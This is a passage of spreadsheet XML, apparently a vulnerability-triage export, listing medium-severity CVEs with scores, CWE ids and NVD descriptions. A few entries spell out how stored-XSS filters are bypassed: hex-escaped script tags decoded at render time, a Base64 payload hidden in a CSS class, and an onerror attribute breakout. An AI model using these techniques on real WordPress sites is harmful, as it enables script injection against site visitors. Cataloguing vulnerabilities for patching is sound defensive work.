        <v>6.4</v>
      </c>
      <c r="D4181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4181" s="5" t="inlineStr"/>
      <c r="F4181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4181" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4181" s="5" t="inlineStr"/>
      <c r="I4181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4181" s="5" t="inlineStr"/>
      <c r="K4181" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L4181" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M4181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t>
        </is>
      </c>
    </row>
    <row r="4182">
      <c r="A4182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7438</t>
        </is>
      </c>
      <c r="C4182" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4182" s="5" t="inlineStr"/>
      <c r="F4182" s="5" t="inlineStr"/>
      <c r="G4182" s="5" t="inlineStr"/>
      <c r="H4182" s="5" t="inlineStr"/>
      <c r="I4182" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4182" s="5" t="inlineStr"/>
      <c r="K4182" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4182" s="5" t="inlineStr">
        <is>
          <t>The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `supertitle` and `subtitle` attributes of the `bold_timeline_item` shortcode in all versions up to, and including, 1.2.8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M4182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7438</t>
        </is>
      </c>
    </row>
    <row r="4183">
      <c r="A4183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75966</t>
        </is>
      </c>
      <c r="C4183" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4183" s="5" t="inlineStr"/>
      <c r="F4183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4183" s="5" t="inlineStr"/>
      <c r="H4183" s="5" t="inlineStr"/>
      <c r="I4183" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4183" s="5" t="inlineStr"/>
      <c r="K4183" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4183" s="5" t="inlineStr">
        <is>
          <t>The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'episode_contributor[..][..][comment]' Parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The contributor comment is stored in a plugin-managed custom table, bypassing WordPress core's wp_kses_post filter, and the save_post hook fires without a nonce check, meaning any user who can edit posts can exploit this without further preconditions.</t>
        </is>
      </c>
      <c r="M4183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75966</t>
        </is>
      </c>
    </row>
    <row r="4184">
      <c r="A4184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76573</t>
        </is>
      </c>
      <c r="C4184" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4184" s="5" t="inlineStr"/>
      <c r="F4184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4184" s="5" t="inlineStr"/>
      <c r="H4184" s="5" t="inlineStr"/>
      <c r="I4184" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4184" s="5" t="inlineStr"/>
      <c r="K4184" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4184" s="5" t="inlineStr">
        <is>
          <t>The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'not_found' Shortcode Attribute in all versions up to, and including, 3.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76573</t>
        </is>
      </c>
    </row>
    <row r="4185">
      <c r="A4185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76931</t>
        </is>
      </c>
      <c r="C4185" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4185" s="5" t="inlineStr"/>
      <c r="F4185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4185" s="5" t="inlineStr"/>
      <c r="H4185" s="5" t="inlineStr"/>
      <c r="I4185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4185" s="5" t="inlineStr"/>
      <c r="K4185" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4185" s="5" t="inlineStr">
        <is>
          <t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t>
        </is>
      </c>
      <c r="M4185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t>
        </is>
      </c>
    </row>
    <row r="4186">
      <c r="A4186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77186</t>
        </is>
      </c>
      <c r="C4186" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4186" s="5" t="inlineStr"/>
      <c r="F4186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4186" s="5" t="inlineStr"/>
      <c r="H4186" s="5" t="inlineStr"/>
      <c r="I4186" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4186" s="5" t="inlineStr"/>
      <c r="K4186" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4186" s="5" t="inlineStr">
        <is>
          <t>The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fallback' Shortcode Attribute in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The bypass relies on hex-encoded shortcode attribute payloads (e.g. \x3cscript\x3e), which wp_kses_post cannot strip on save because they appear as literal backslash sequences rather than real HTML tags; WordPress core's shortcode_parse_atts() then calls stripcslashes() at render time, decoding the escapes into real angle brackets before they reach the unescaped sink.</t>
        </is>
      </c>
      <c r="M4186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77186</t>
        </is>
      </c>
    </row>
    <row r="4187">
      <c r="A4187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77187</t>
        </is>
      </c>
      <c r="C4187" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4187" s="5" t="inlineStr"/>
      <c r="F4187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4187" s="5" t="inlineStr"/>
      <c r="H4187" s="5" t="inlineStr"/>
      <c r="I4187" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4187" s="5" t="inlineStr"/>
      <c r="K4187" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4187" s="5" t="inlineStr">
        <is>
          <t>The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77187</t>
        </is>
      </c>
    </row>
    <row r="4188">
      <c r="A4188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="C4188" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4188" s="5" t="inlineStr"/>
      <c r="F4188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4188" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4188" s="5" t="inlineStr"/>
      <c r="I4188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4188" s="5" t="inlineStr"/>
      <c r="K4188" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4188" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M4188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="4189">
      <c r="A4189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="C4189" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4189" s="5" t="inlineStr"/>
      <c r="F4189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4189" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4189" s="5" t="inlineStr"/>
      <c r="I4189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4189" s="5" t="inlineStr"/>
      <c r="K4189" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4189" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M4189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="4190">
      <c r="A4190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79974</t>
        </is>
      </c>
      <c r="C4190" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4190" s="5" t="inlineStr"/>
      <c r="F4190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4190" s="5" t="inlineStr"/>
      <c r="H4190" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4190" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4190" s="5" t="inlineStr"/>
      <c r="K4190" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4190" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Authentication vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M4190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79974</t>
        </is>
      </c>
    </row>
    <row r="4191">
      <c r="A4191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82081</t>
        </is>
      </c>
      <c r="C4191" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4191" s="5" t="inlineStr"/>
      <c r="F4191" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4191" s="5" t="inlineStr"/>
      <c r="H4191" s="5" t="inlineStr"/>
      <c r="I4191" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4191" s="5" t="inlineStr"/>
      <c r="K4191" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4191" s="5" t="inlineStr">
        <is>
          <t>wallabag 2 through 2.6.14 allows SSRF because a crafted title or content field is mishandled during PDF export.</t>
        </is>
      </c>
      <c r="M4191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82081</t>
        </is>
      </c>
    </row>
    <row r="4192">
      <c r="A4192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83534</t>
        </is>
      </c>
      <c r="C4192" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4192" s="5" t="inlineStr"/>
      <c r="F4192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4192" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H4192" s="5" t="inlineStr"/>
      <c r="I4192" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4192" s="5" t="inlineStr"/>
      <c r="K4192" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L4192" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability in the anon.anonymize_database_parallel() function that allows the owner of a table to run arbitrary code with superuser privilege. The issue is fixed in PostgreSQL Anonymizer 3.2.0 and later versions</t>
        </is>
      </c>
      <c r="M4192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83534</t>
        </is>
      </c>
    </row>
    <row r="4193">
      <c r="A4193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85414</t>
        </is>
      </c>
      <c r="C4193" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4193" s="5" t="inlineStr"/>
      <c r="F4193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4193" s="5" t="inlineStr"/>
      <c r="H4193" s="5" t="inlineStr"/>
      <c r="I4193" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4193" s="5" t="inlineStr"/>
      <c r="K4193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4193" s="5" t="inlineStr">
        <is>
          <t>The Gallery : FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'custom_settings' Shortcode Attribute in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85414</t>
        </is>
      </c>
    </row>
    <row r="4194">
      <c r="A4194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8623</t>
        </is>
      </c>
      <c r="C4194" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4194" s="5" t="inlineStr"/>
      <c r="F4194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4194" s="5" t="inlineStr"/>
      <c r="H4194" s="5" t="inlineStr"/>
      <c r="I4194" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4194" s="5" t="inlineStr"/>
      <c r="K4194" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4194" s="5" t="inlineStr">
        <is>
          <t>The Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_content (class attribute of .dvcss element)' parameter in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is embedded as a Base64-encoded JSON object in a CSS class name on a Custom HTML block; the frontend parseCSSElements() function decodes it client-side with atob() and JSON.parse() and renders the logo property as raw HTML, meaning no server-side or client-side sanitization intercepts the malicious script before DOM insertion.</t>
        </is>
      </c>
      <c r="M4194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8623</t>
        </is>
      </c>
    </row>
    <row r="4195">
      <c r="A4195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8625</t>
        </is>
      </c>
      <c r="C4195" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4195" s="5" t="inlineStr"/>
      <c r="F4195" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4195" s="5" t="inlineStr"/>
      <c r="H4195" s="5" t="inlineStr"/>
      <c r="I4195" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4195" s="5" t="inlineStr"/>
      <c r="K4195" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4195" s="5" t="inlineStr">
        <is>
          <t>The Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_content (Custom HTML block inner HTML)' parameter in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A Contributor-level attacker can insert a crafted .df-element div with data-df-lightbox='thumb' via a Custom HTML block, whose inner HTML is passed as the title argument to parseThumbs() at render time, enabling both innerHTML injection into a span element and attribute breakout via an onerror handler on a constructed img element.</t>
        </is>
      </c>
      <c r="M4195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8625</t>
        </is>
      </c>
    </row>
    <row r="4196">
      <c r="A4196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87870</t>
        </is>
      </c>
      <c r="C4196" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4196" s="5" t="inlineStr"/>
      <c r="F4196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4196" s="5" t="inlineStr"/>
      <c r="H4196" s="5" t="inlineStr"/>
      <c r="I4196" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4196" s="5" t="inlineStr"/>
      <c r="K4196" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4196" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms - Scheduled Exports plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API Parameters (interval, format, emailTo) in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level privileges and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The REST endpoint is registered without a permission_callback and only validates a nonce without checking user capabilities.</t>
        </is>
      </c>
      <c r="M4196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87870</t>
        </is>
      </c>
    </row>
    <row r="4197">
      <c r="A4197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4197" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62718</t>
        </is>
      </c>
      <c r="C4197" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4197" s="5" t="inlineStr"/>
      <c r="F4197" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G4197" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4197" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I4197" s="5" t="inlineStr">
        <is>
          <t>2026-04-09</t>
        </is>
      </c>
      <c r="J4197" s="5" t="inlineStr"/>
      <c r="K4197" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L4197" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.</t>
        </is>
      </c>
      <c r="M4197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62718</t>
        </is>
      </c>
    </row>
    <row r="4198">
      <c r="A4198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13148</t>
        </is>
      </c>
      <c r="C4198" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4198" s="5" t="inlineStr"/>
      <c r="F4198" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4198" s="5" t="inlineStr"/>
      <c r="H4198" s="5" t="inlineStr"/>
      <c r="I4198" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4198" s="5" t="inlineStr"/>
      <c r="K4198" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L4198" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime vulnerability in Softing smartLink allows resource leak exposure.
This issue affects smartLink HW-PN: from 1.04 before 1.10.</t>
        </is>
      </c>
      <c r="M4198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13148</t>
        </is>
      </c>
    </row>
    <row r="4199">
      <c r="A4199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18121</t>
        </is>
      </c>
      <c r="C4199" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4199" s="5" t="inlineStr"/>
      <c r="F4199" s="5" t="inlineStr"/>
      <c r="G4199" s="5" t="inlineStr"/>
      <c r="H4199" s="5" t="inlineStr"/>
      <c r="I4199" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4199" s="5" t="inlineStr"/>
      <c r="K4199" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L4199" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9.5.2 and below is vulnerable to an authorization bypass (IDOR) because the frontend calendar lightbox endpoint (/ccm/calendar/view_event/{bID}/{occurrence_id}) does not verify that the caller is permitted to view the calendar that owns the requested event occurrence. The controller loads the occurrence directly from an attacker‑supplied, sequential identifier without confirming that it belongs to the calendar configured on the referenced block. An unauthenticated visitor who can render any public calendar block with lightbox properties enabled could therefore supply an arbitrary occurrence identifier and disclose event metadata — title, date, description, page link, and configured event attributes — from calendars they are not permitted to view. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="M4199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18121</t>
        </is>
      </c>
    </row>
    <row r="4200">
      <c r="A4200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19683</t>
        </is>
      </c>
      <c r="C4200" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4200" s="5" t="inlineStr"/>
      <c r="F4200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4200" s="5" t="inlineStr"/>
      <c r="H4200" s="5" t="inlineStr">
        <is>
          <t>tp-link:dr3150, tp-link:dr3150_firmware, tp-link:dr3220v-4g, tp-link:dr3220v-4g_firmware, tp-link:dr3650v, tp-link:dr3650v-4g, tp-link:dr3650v-4g_firmware, tp-link:dr3650v_firmware, tp-link:er603wp-4g-outdoor, tp-link:er603wp-4g-outdoor_firmware</t>
        </is>
      </c>
      <c r="I4200" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4200" s="5" t="inlineStr"/>
      <c r="K4200" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L4200" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in the Dynamic DNS (DDNS) functionality of TP-Link Omada Gateways. During communication with a third-party DDNS service, authentication credentials are transmitted over an unencrypted channel. An attacker who can observe or manipulate traffic between an affected device and the DDNS service may obtain sensitive authentication information or interfere with DDNS update operations. Exploitation requires DDNS to be configured, communication with an external DDNS service, and attacker visibility or control of the relevant network path. 
Successful exploitation may result in disclosure of DDNS account credentials, unauthorized access to DDNS management functionality, or modification of DNS records associated with the affected deployment.</t>
        </is>
      </c>
      <c r="M4200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19683</t>
        </is>
      </c>
    </row>
    <row r="4201">
      <c r="A4201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25552</t>
        </is>
      </c>
      <c r="C4201" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4201" s="5" t="inlineStr"/>
      <c r="F4201" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4201" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H4201" s="5" t="inlineStr"/>
